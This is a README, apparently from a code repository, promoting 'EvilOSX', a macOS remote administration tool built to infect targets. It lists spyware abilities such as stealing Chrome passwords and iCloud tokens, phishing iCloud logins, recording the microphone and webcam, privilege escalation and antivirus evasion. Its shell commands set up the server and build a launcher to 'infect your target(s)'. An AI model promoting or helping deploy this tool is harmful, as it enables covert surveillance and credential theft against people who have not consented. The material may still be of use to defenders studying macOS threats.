An evil RAT (Remote Administration Tool) for macOS / OS X.
- Emulate a terminal instance
- Simple extendable module system
- No bot dependencies (pure python)
- Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
- GUI and CLI support
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Retrieve/monitor the clipboard
- Retrieve browser history (Chrome and Safari)
- Phish for iCloud passwords via iTunes
- iTunes (iOS) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation
How To Use
# Clone or download this repository $ git clone https://github.com/Marten4n6/EvilOSX # Go into the repository $ cd EvilOSX # Install dependencies required by the server $ sudo pip install -r requirements.txt # Start the GUI $ python start.py # Lastly, run a built launcher on your target(s)
Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.
There's also a CLI for those who want to use this over SSH:
# Create a launcher to infect your target(s) $ python start.py --builder # Start the CLI $ python start.py --cli --port 1337 # Lastly, run a built launcher on your target(s)
EvilOSX - pure python, post-exploitation, RAT
*Beware click the link!